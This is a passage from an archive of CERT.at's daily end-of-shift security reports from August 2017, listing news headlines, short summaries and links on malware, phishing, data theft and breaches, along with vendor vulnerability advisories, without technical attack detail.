forensic software ElcomSoft, the Russia-based maker of forensic software, has managed to find a way to access the data stored in Apples iCloud Keychain, if Apple ID account credentials are available. --------------------------------------------- http://www.theregister.co.uk/2017/08/22/apple_icloud_keychain_easily_slurpe… ∗∗∗ Is the Power Grid Getting More Vulnerable to Cyber Attacks? ∗∗∗ --------------------------------------------- Rising computerization opens doors for increasingly aggressive adversaries, but defenses are better than many might think. --------------------------------------------- https://www.scientificamerican.com/article/is-the-power-grid-getting-more-v… ∗∗∗ Ukrainian Security Firm Warns of Another Massive Global Cyberattack ∗∗∗ --------------------------------------------- A new wave of cyberattacks could be launched as soon as this week, Ukrainian security firm ISSP warns, pointing out that the main objective would be taking down networks on August 24 when Ukraine celebrates the Independence Day. --------------------------------------------- http://news.softpedia.com/news/ukrainian-security-firm-warns-massive-global… ∗∗∗ Google schmeißt 500 potenzielle Spionage-Apps aus App Store ∗∗∗ --------------------------------------------- Ein Software Development Kit für Werbeeinblendungen soll Schnüffelfunktionen mitbringen. Damit ausgestattete Android-Apps weisen über 100 Millionen Downloads auf, warnen Sicherheitsforscher. --------------------------------------------- https://heise.de/-3810366 ∗∗∗ Hintergrund: Hardware-Fuzzing: Hintertüren und Fehler in CPUs aufspüren ∗∗∗ --------------------------------------------- Ein Prozessor-Fuzzer analysiert Hardware, der man normalerweise blind vertrauen muss. In ersten Testläufen wurde er bei nahezu allen Architekturen fündig und spürte etwa undokumentierte CPU-Befehle auf. Sandsifter ist kostenlos und frei verfügbar; der Autor hilft sogar bei der Analyse. --------------------------------------------- https://heise.de/-3809408 ===================== = Advisories = ===================== ∗∗∗ DSA-3952 libxml2 - security update ∗∗∗ --------------------------------------------- Several vulnerabilities were discovered in libxml2, a library providingsupport to read, modify and write XML and HTML files. A remote attackercould provide a specially crafted XML or HTML file that, when processedby an application using libxml2, would cause a denial-of-service againstthe application, information leaks, or potentially, the execution ofarbitrary code with the privileges of the user running the application. --------------------------------------------- https://www.debian.org/security/2017/dsa-3952 ∗∗∗ Automated Logic Corporation WebCTRL, i-VU, SiteScan ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01 ∗∗∗ SpiderControl SCADA Web Server ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-234-03 ∗∗∗ SpiderControl SCADA MicroBrowser ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-234-02 ∗∗∗ Security Advisory - Two Command Injection Vulnerabilities in The FusionSphere OpenStack ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170823-… ∗∗∗ IBM Security Bulletin: IBM MQ Appliance is affected by a Network Security Services (NSS) vulnerability (CVE-2017-5461) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22005055 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Rational Application Developer for WebSphere Software ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007464 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in OpenSource NTP affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22002233 ∗∗∗ Multiple GNU Binutils vulnerabilities ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K23729200 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.08.2017
by Daily end-of-shift report 22 Aug '17

22 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Montag 21-08-2017 18:00 − Dienstag 22-08-2017 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Gestohlene Nacktfotos von Ski-Star Lindsey Vonn im Netz ∗∗∗ --------------------------------------------- Unbekannte haben das Handy von US-Skistar Lindsey Vonn (32) geknackt und Nacktfotos von ihr und ihrem Ex-Freund Tiger Woods (41) gestohlen. --------------------------------------------- https://futurezone.at/digital-life/gestohlene-nacktfotos-von-ski-star-linds… ∗∗∗ Unsichere Passwörter: Angriffe auf Microsoft-Konten um 300 Prozent gestiegen ∗∗∗ --------------------------------------------- Noch immer haben viele Nutzer schlechte Passwörter und benutzen diese gleich für mehrere Accounts. Das geht aus Microsofts eigener Sicherheitsanalyse hervor, die Trends aus dem Enterprise- und Privatkundengeschäft präsentiert. --------------------------------------------- https://www.golem.de/news/unsichere-passwoerter-angriffe-auf-microsoft-kont… ∗∗∗ Enigma ICO Heist Robs Nearly $500,000 in Ethereum From Investors ∗∗∗ --------------------------------------------- Cryptos fine and good, but make sure youre looking after the basics. --------------------------------------------- https://www.wired.com/story/enigma-ico-ethereum-heist ∗∗∗ Who’s Blocked by Bad Guys? ∗∗∗ --------------------------------------------- Just a quick post about an interesting file found in a phishing kit. Bad guys use common techniques to prevent crawlers, scanners or security companies from accessing their pages. Usually, .. --------------------------------------------- https://blog.rootshell.be/2017/08/21/whos-blocked-bad-guys/ ∗∗∗ Erpressungstrojaner WannaCry hat erneut zugeschlagen ∗∗∗ --------------------------------------------- Offenbar hat LG bei einigen Service-Systemen wichtige Sicherheitspatches nicht installiert und WannaCry infizierte diverse Computer des Unternehmens in Südkorea. Dabei soll es aber zu keinen größeren Schäden gekommen sein. --------------------------------------------- https://heise.de/-3809790 ∗∗∗ Kriminelle stehlen Telefonnummern von Bitcoin-Investoren ∗∗∗ --------------------------------------------- Bitten Mobilfunker um Transfer der Nummer auf neues Gerät – oft Verluste in Millionenhöhe --------------------------------------------- http://derstandard.at/2000062971633 ∗∗∗ Hacker drohen, "Game of Thrones"-Finale vorab online zu stellen ∗∗∗ --------------------------------------------- HBO hat sich bislang geweigert, Lösegeld zu bezahlen – zwei von sechs Folgen waren früher ins Netz gelangt --------------------------------------------- http://derstandard.at/2000062960237 ∗∗∗ Betrug: Mobilfunkbetreiber warnen vor "Ping Calls" ∗∗∗ --------------------------------------------- Hinter unbekannter Nummer auf dem Handydisplay steckt manchmal ein Betrüger --------------------------------------------- http://derstandard.at/2000062990431 ===================== = Advisories = ===================== ∗∗∗ Sicherheitsupdate: Thunderbird updaten und sicher konfigurieren ∗∗∗ --------------------------------------------- Mehrere Schwachstellen in Mozilla Thunderbird ermöglichen einem entfernten, nicht authentisierten Angreifer das Ausführen beliebigen Programmcodes, das Umgehen von Sicherheitsvorkehrungen, die Darstellung falscher Informationen und verschiedener Denial-of-Service (DoS)-Angriffe. --------------------------------------------- https://www.kuketz-blog.de/sicherheitsupdate-thunderbird-updaten-und-sicher… ∗∗∗ DSA-3949 augeas - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2017/dsa-3949 ∗∗∗ Multiple vulnerabilities in Progress Sitefinity ∗∗∗ --------------------------------------------- https://www.sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-… ∗∗∗ Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products ∗∗∗ --------------------------------------------- https://www.sec-consult.com/en/blog/advisories/multiple-critical-vulnerabil… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.08.2017
by Daily end-of-shift report 21 Aug '17

21 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Freitag 18-08-2017 18:00 − Montag 21-08-2017 18:00 Handler: Olaf Schwarz Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Researchers Win $100,000 for New Spear-Phishing Detection Method ∗∗∗ --------------------------------------------- Facebook has awarded this years Internet Defense Prize worth $100,000 to a team of researchers from the University of California, Berkeley, who came up with a new method of detecting spear-phishing attacks in closely monitored enterprise networks. --------------------------------------------- https://www.bleepingcomputer.com/news/security/researchers-win-100-000-for-… ∗∗∗ Wie Hacker große Frachtschiffe ins Visier nehmen ∗∗∗ --------------------------------------------- Mithilfe von Malware können Handelsschiffe lahmgelegt und manövrierunfähig gemacht werden. Kriminelle könnten sogar die Kollision zweier Schiffe herbeiführen. --------------------------------------------- https://futurezone.at/digital-life/wie-hacker-grosse-frachtschiffe-ins-visi… ∗∗∗ Personal Security Guide – iOS/Android ∗∗∗ --------------------------------------------- We’ve covered a lot of personal security practices, but many people forget how important it is to secure mobile devices, which are riddled with personal information. --------------------------------------------- https://blog.sucuri.net/2017/08/personal-security-guide-iosandroid.html ∗∗∗ Warning: Enigma Hacked; Over $470,000 in Ethereum Stolen So Far ∗∗∗ --------------------------------------------- More Ethereum Stolen! An unknown hacker has so far stolen more than $471,000 worth of Ethereum—one of the most popular and increasingly valuable cryptocurrencies—in yet another Ethereum hack that hit the popular cryptocurrency investment platform, Enigma. --------------------------------------------- http://thehackernews.com/2017/08/enigma-cryptocurrency-hack.html ∗∗∗ DNSSEC Key Signing Key Rollover ∗∗∗ --------------------------------------------- On October 11, 2017, the Internet Corporation for Assigned Names and Numbers (ICANN) will be changing the Root Zone Key Signing Key (KSK) used in the domain name system (DNS) Security Extensions (DNSSEC) protocol. DNSSEC is a set of DNS protocol extensions used to digitally sign DNS information, which is an important part of preventing domain name hijacking. Updating the DNSSEC KSK is a crucial security step, similar to updating a PKI Root Certificate. --------------------------------------------- https://www.us-cert.gov/ncas/current-activity/2017/08/21/DNSSEC-Key-Signing… ∗∗∗ Zero-Day-Lücken im PDF Reader: Foxit will doch patchen ∗∗∗ --------------------------------------------- Ursprünglich wollte Foxit die zwei Lücken, die Angreifern unter bestimmten Umständen die lokale Codeausführung ermöglichen, nicht schließen. Mittlerweile hat sich der Hersteller aber anders entschieden. --------------------------------------------- https://heise.de/-3807762 ∗∗∗ SyncCrypt: Neue Ransomware lauert in JPG-Dateien ∗∗∗ --------------------------------------------- Um AV-Software auszutricksen, verbirgt sich die Ransomware SyncCrypt in Bilddateien. Einmal auf dem System, wird sie per Skript extrahiert und ausgeführt. Kostenlose Entschlüsselungs-Tools gibt es bislang nicht. --------------------------------------------- https://heise.de/-3808437 ∗∗∗ Blowing the Whistle on Bad Attribution ∗∗∗ --------------------------------------------- The New York Times this week published a fascinating story about a young programmer in Ukraine whod turned himself in to the local police. The Times says the man did so after one of his software tools was identified by the U.S. government as part of the arsenal used by Russian hackers suspected of hacking into the Democratic National Committee (DNC) last year. Its a good read, as long as you can ignore that the premise of the piece is completely wrong. --------------------------------------------- https://krebsonsecurity.com/2017/08/blowing-the-whistle-on-bad-attribution/ ∗∗∗ Hacker übernahmen Facebook- und Twitter-Account von Playstation ∗∗∗ --------------------------------------------- Die Hackergruppe OurMine setzte mit den Social-Media-Profilen diverse Tweets und Facebook-Posts ab --------------------------------------------- http://derstandard.at/2000062906632 ===================== = Advisories = ===================== ∗∗∗ USN-3397-1: strongSwan vulnerability ∗∗∗ --------------------------------------------- A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 17.04 Ubuntu 16.04 LTS Ubuntu 14.04 LTSSummarystrongSwan could be made to crash or hang if it received specially craftednetwork traffic. --------------------------------------------- http://www.ubuntu.com/usn/usn-3397-1/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in Oracle® Java™ Runtime Environment version 1.7 affect IBM Flex System Manager(FSM) Storage Manager Install Anywhere (SMIA) configuration tool ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=isg3T1025471 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect ASP.NET Core in IBM Bluemix ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22007209 ∗∗∗ IBM Security Bulletin: No verification of user rights for certain applications on MaaS360 Windows installations. (CVE-2017-1422). ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006985 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in the IBM SDK, Java Technology Edition affects IBM Performance Management products ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22006808 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere DataPower XC10 Appliance ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22005299 ∗∗∗ IBM Security Bulletin: Vulnerability CVE-2017-1000381 and CVE-2017-11499 in Node.js affects IBM i ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=nas8N1022230 ∗∗∗ IBM Security Bulletin: January 2016 Java Platform Standard Edition Vulnerabilities in Multiple N Series Products ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1010526 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.08.2017
by Daily end-of-shift report 18 Aug '17

18 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 17-08-2017 18:00 − Freitag 18-08-2017 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Betrug: Verbraucherzentrale warnt vor gefälschten Youporn-Mahnungen ∗∗∗ --------------------------------------------- Eine Spam-Kampagne versendet derzeit angebliche Mahnungen für die Nutzung von Youporn im Namen einer Münchener Anwaltskanzlei. Diese warnt selbst vor den Fälschungen. --------------------------------------------- https://www.golem.de/news/betrug-verbraucherzentrale-warnt-vor-gefaelschten… ∗∗∗ OWASP 2017 Top 10 vs. 2013 Top 10 ∗∗∗ --------------------------------------------- After a long interval of four years, OWASP in April 2017 released a draft of its latest list of "Top 10 Web Application Security Vulnerabilities." The OWASP Top 10 has served as a benchmark for the world of application security for the last 14 years. It was designed to allow developers to identify and avoid [...] --------------------------------------------- http://resources.infosecinstitute.com/owasp-2017-top-10-vs-2013-top-10/ ∗∗∗ Hacker Publishes iOS Secure Enclave Firmware Decryption Key ∗∗∗ --------------------------------------------- A hacker identified only as xerub published the decryption key unlocking the iOS Secure Enclave Processor. --------------------------------------------- http://threatpost.com/hacker-publishes-ios-secure-enclave-firmware-decrypti… ∗∗∗ Cisco schließt einen Haufen Sicherheitslücken ∗∗∗ --------------------------------------------- Cisco hat 19 Sicherheitslücken in verschiedensten Produkten mit Sicherheitsupdates geschlossen. Drei der Updates sind mit hoher Priorität eingestuft. --------------------------------------------- https://heise.de/-3807549 ∗∗∗ Gefälschte A1-Rechnung installiert Schadsoftware ∗∗∗ --------------------------------------------- Eine gefälschte A1-Nachricht fordert Empfänger/innen dazu auf, dass sie eine Website aufrufen und sich auf dieser ihre Rechnung ansehen. Wer dem nachkommt, lädt die Datei „quittung.lnk“ herunter. Bei dieser handelt es sich um keine Kostenaufstellung, sondern um eine Verknüpfung zu einer Schadsoftware. Aus diesem Grund dürfen Sie die Verknüpfung nicht öffnen. --------------------------------------------- https://www.watchlist-internet.at/gefaelschte-rechnungen/gefaelschte-a1-rec… ===================== = Advisories = ===================== ∗∗∗ Philips DoseWise Portal Vulnerabilities ∗∗∗ --------------------------------------------- This medical device advisory contains mitigation details for hard-coded credentials and cleartext storage of sensitive information vulnerabilities in Philips’ DoseWise Portal web application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-17-229-01 ∗∗∗ ZDI-17-693: Bitdefender Total Security bdfwfpf Kernel Driver Double Free Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of Bitdefender Total Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-17-693/ ∗∗∗ DFN-CERT-2017-1469: ClamAV: Mehrere Schwachstellen ermöglichen u.a. verschiedene Denial-of-Service-Angriffe ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1469/ ∗∗∗ DFN-CERT-2017-1476: Mozilla Thunderbird: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1476/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Monitoring ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22007056 ∗∗∗ Splunk Input Validation Flaws in Web Interface Let Remote Users Conduct Cross-Site Scripting Attacks ∗∗∗ --------------------------------------------- http://www.securitytracker.com/id/1039198 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.08.2017
by Daily end-of-shift report 17 Aug '17

17 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 16-08-2017 18:00 − Donnerstag 17-08-2017 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Banking Trojans Set Their Sights on Taxi and Ride-Hailing Apps ∗∗∗ --------------------------------------------- It was to be expected that Android banking trojan operators would eventually set their sights on ride-hailing applications, considering that these apps work with a users financial data on a daily basis. [...] --------------------------------------------- https://www.bleepingcomputer.com/news/security/banking-trojans-set-their-si… ∗∗∗ Ransomware: Locky kehrt erneut zurück ∗∗∗ --------------------------------------------- Mit Locky kehrt eine bekannte Ransomware nach mehrmonatiger Abwesenheit zurück - mit den Dateiendungen Diablo6 und Lukitus. Immer wieder tauchen neue Versionen auf, die vermutlich von Kriminellen für erpresserische Zwecke gemietet werden. (Malware, Virus) --------------------------------------------- https://www.golem.de/news/ransomware-locky-kehrt-erneut-zurueck-1708-129539… ∗∗∗ NotPetya: Maersk erwartet bis zu 300 Millionen Dollar Verlust ∗∗∗ --------------------------------------------- Containerterminals standen still, Schiffe konnten weder gelöscht noch beladen werden: Mehrere Wochen hielt der Trojaner den dänischen Mega-Konzern Maersk in Atem. Die Reederei Maersk Line und der Hafenbetreiber APM Terminals wurden schwer getroffen. --------------------------------------------- https://heise.de/-3804688 ∗∗∗ Handy-Ersatzteile können Malware einschleusen ∗∗∗ --------------------------------------------- Über Ersatzteile könnten Angreifer unbemerkt Malware in Smartphones schmuggeln. Erkennungsmethoden oder gar Abwehrmaßnahmen gibt es bislang keine, warnen israelische Sicherheitsforscher. --------------------------------------------- https://heise.de/-3804758 ∗∗∗ Sicherheitsupdates: Angreifer könnten Drupal-Webseiten ein bisschen umbauen ∗∗∗ --------------------------------------------- Nutzer von Drupal sollten zügig die aktuellen Versionen installieren. In diesen haben die Entwickler mehrere Sicherheitslücken geschlossen. --------------------------------------------- https://heise.de/-3805042 ∗∗∗ iMessage: Neuer Betrugsversuch macht die Runde ∗∗∗ --------------------------------------------- Aktuell erreichen Nutzer Nachrichten mit Links, die sie zur Eingabe persönlicher Daten nötigen. Sie stammen angeblich von Apple. --------------------------------------------- https://heise.de/-3804878 ===================== = Advisories = ===================== ∗∗∗ DSA-3944 mariadb-10.0 - security update ∗∗∗ --------------------------------------------- Several issues have been discovered in the MariaDB database server. Thevulnerabilities are addressed by upgrading MariaDB to the new upstreamversion 10.0.32. Please see the MariaDB 10.0 Release Notes for furtherdetails: --------------------------------------------- https://www.debian.org/security/2017/dsa-3944 ∗∗∗ Drupal Core - Multiple Vulnerabilities - SA-CORE-2017-004 ∗∗∗ --------------------------------------------- Drupal 8.3.7 is a maintenance releases which contain fixes for security vulnerabilities.Download Drupal 8.3.7Updating your existing Drupal 8 sites is strongly recommended (see instructions for Drupal 8). This release fixes security issues only; there are no new features nor non-security-related bug fixes in this release. See the 8.3.7 release notes for details on important changes and known issues affecting this release. --------------------------------------------- https://www.drupal.org/SA-CORE-2017-004 ∗∗∗ Filr 3.2.1 Update ∗∗∗ --------------------------------------------- Abstract: This update provides a number of general bug fixes for Micro Focus Filr, Search and MySQL appliances including an updated Filr 3.2.1 Desktop client. --------------------------------------------- https://download.novell.com/Download?buildid=zZ3A-xIEvO0~ ∗∗∗ VU#793496: Open Shortest Path First (OSPF) protocol implementations may improperly determine LSA recency ∗∗∗ --------------------------------------------- http://www.kb.cert.org/vuls/id/793496 ∗∗∗ Entity Reference - Moderately Critical - Access Bypass - DRUPAL-SA-CONTRIB-2017-067 ∗∗∗ --------------------------------------------- https://www.drupal.org/node/2902596 ∗∗∗ Views refresh - Moderately Critical - Access Bypass - DRUPAL-SA-CONTRIB-2017-069 ∗∗∗ --------------------------------------------- https://www.drupal.org/node/2902606 ∗∗∗ Views - Moderately Critical - Access Bypass - DRUPAL-SA-CONTRIB-2017-068 ∗∗∗ --------------------------------------------- https://www.drupal.org/node/2902604 ∗∗∗ Cisco Application Policy Infrastructure Controller SSH Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco TelePresence Video Communication Server Denial of Service Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Ultra Services Platform Deployment Configuration Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Ultra Services Framework AutoVNF Configuration Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Unified Communications Manager Horizontal Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco StarOS for ASR 5000 Series Routers Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco StarOS for ASR 5000 Series Routers FTP Configuration File Modification Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco StarOS for ASR 5000 Series Routers Command-Line Interface Security Bypass Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Elastic Services Controller Sensitive Log Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Elastic Services Controller Configuration Parameters Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Elastic Services Controller Cross-Site Scripting Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Elastic Services Controller Configuration Files Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Virtual Network Function Element Manager Arbitrary Command Execution Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Security Appliances SNMP Polling Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco RV340, RV345, and RV345P Dual WAN Gigabit VPN Routers Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Policy Suite Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Prime Infrastructure HTML Injection Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco AnyConnect WebLaunch Cross-Site Scripting Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Cisco Application Policy Infrastructure Controller Custom Binary Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ IBM Security Bulletin: Security Vulnerabilities in Apache FOP and Apache Batik affect IBM WebSphere Portal (CVE-2017-5661, CVE-2017-5662) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22006871 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.08.2017
by Daily end-of-shift report 16 Aug '17

16 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Montag 14-08-2017 18:00 − Mittwoch 16-08-2017 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Millions of RDP Endpoints Exposed Online and Ready for Bad Things ∗∗∗ --------------------------------------------- An Internet-wide scan carried out by security researchers from Rapid7 has discovered over 11 million devices with 3389/TCP ports left open online, of which over 4.1 million are specifically speaking the RDP protocol. [...] --------------------------------------------- https://www.bleepingcomputer.com/news/security/millions-of-rdp-endpoints-ex… ∗∗∗ Pulse Wave - New DDoS Assault Pattern Discovered ∗∗∗ --------------------------------------------- A new method of carrying out DDoS attacks named Pulse Wave is causing problems to certain DDoS mitigation solutions, allowing attackers to down servers previously thought to be secured. [...] --------------------------------------------- https://www.bleepingcomputer.com/news/security/pulse-wave-new-ddos-assault-… ∗∗∗ Attackers Backdoor Another Software Update Mechanism ∗∗∗ --------------------------------------------- Researchers at Kaspersky Lab said today that the update mechanism for Korean server management software provider NetSarang was compromised and serving a backdoor called ShadowPad. --------------------------------------------- http://threatpost.com/attackers-backdoor-another-software-update-mechanism/… ∗∗∗ Analysis of a Paypal phishing kit, (Wed, Aug 16th) ∗∗∗ --------------------------------------------- They are plenty of phishing kits in the wild that try to lure victims to provide their credentials. Services like Paypal arenice targets and we can find new fake pages almost daily. Sometimes, the web server isnt properly configured and the source code is publicly available. A few days ago, I was lucky to find a ZIP archivecontaining a very nice phishing kit targeting Paypal. I took some time to have a look at it. --------------------------------------------- https://isc.sans.edu/diary/rss/22726 ∗∗∗ Security Afterworks Spezial – DSGVO – Impulsvorträge und Diskussion ∗∗∗ --------------------------------------------- October 03, 2017 - 4:30 pm - 6:00 pm SBA Research Favoritenstraße 16 1040 Wien --------------------------------------------- https://www.sba-research.org/events/security-afterworks-dsgvo/ ∗∗∗ Decoding Complex Malware – Step-by-Step ∗∗∗ --------------------------------------------- When cleaning websites, one of the most complicated parts of our job is ensuring we find all backdoors. Most of the time, attackers inject code into different locations to increase the chances of reinfecting the site and maintaining access for as long as possible. Our research finds that in 67% of the websites we clean, there is at least one backdoor variant. --------------------------------------------- https://blog.sucuri.net/2017/08/malware-decoding-step-step-guide.html ∗∗∗ The Crisis of Connected Cars: When Vulnerabilities Affect the CAN Standard ∗∗∗ --------------------------------------------- In many instances, researchers and engineers have found ways to hack into modern, internet-capable cars, as has been documented and reported several times. One famous example is the Chrysler Jeep hack that researchers Charlie Miller and Chris Valasek discovered. This hack and those that have come before it have mostly been reliant on specific vulnerabilities in specific makes and/or brands of cars. And once reported, these vulnerabilities were quickly resolved. But what should the security [...] --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/SJgibQgcZtQ/ ∗∗∗ ShadowPad: Spionage-Hintertür in Admintools für Unix- und Linux-Server aufgedeckt ∗∗∗ --------------------------------------------- Eine raffinierte Hintertür wurde von Angreifern per korrekt signiertem Update an die Netzwerk-Admin-Tools der koreanischen Firma NetSarang ausgeliefert. Es dauerte mehr als zwei Wochen, bis der Spionage-Trojaner im Netz eines Bankinstitutes aufflog. --------------------------------------------- https://heise.de/-3803225 ∗∗∗ EV ransomware is targeting WordPress sites ∗∗∗ --------------------------------------------- WordPress security outfit Wordfence has flagged several attempts by attackers to upload ransomware that provides them with the ability to encrypt a WordPress website’s files. They dubbed the malware "EV ransomware", due to the .ev extension that is added to the encrypted files. --------------------------------------------- https://www.helpnetsecurity.com/2017/08/16/wordpress-ransomware/ ===================== = Advisories = ===================== ∗∗∗ BMC Medical and 3B Medical Luna CPAP Machine ∗∗∗ --------------------------------------------- This medical device advisory contains mitigation details for an improper input validation vulnerability in BMC Medical’s and 3B Medical’s Luna continuous positive airway pressure therapy machine. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-17-227-01 ∗∗∗ Identity Reporting 5.5.1 ∗∗∗ --------------------------------------------- Abstract: This service pack provides enhancements and software fixes for Identity Reporting. For more information about these updates, see the service pack details. --------------------------------------------- https://download.novell.com/Download?buildid=iGYyq6xwjhE~ ∗∗∗ Citrix XenServer Multiple Security Updates ∗∗∗ --------------------------------------------- A number of security vulnerabilities have been identified in Citrix XenServer that may allow a malicious administrator of a guest VM to compromise the host. --------------------------------------------- https://support.citrix.com/article/CTX225941 ∗∗∗ DFN-CERT-2017-1441: Xen: Mehrere Schwachstellen ermöglichen u.a. das Eskalieren von Privilegien ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1441/ ∗∗∗ DFN-CERT-2017-1442: Red Hat JBoss Data Virtualization: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1442/ ∗∗∗ Security Advisory - Out-of-Bounds Memory Access Vulnerability in the Boot Loaders of Huawei Mobile Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-… ∗∗∗ Security Advisory - Two Vulnerabilities in Smart Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170807-… ∗∗∗ Security Advisory - Arbitrary Memory Write Vulnerability in Some Huawei Smart Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-… ∗∗∗ Security Advisory - Authentication Bypass Vulnerability in Huawei Honor 5S Smart Phones 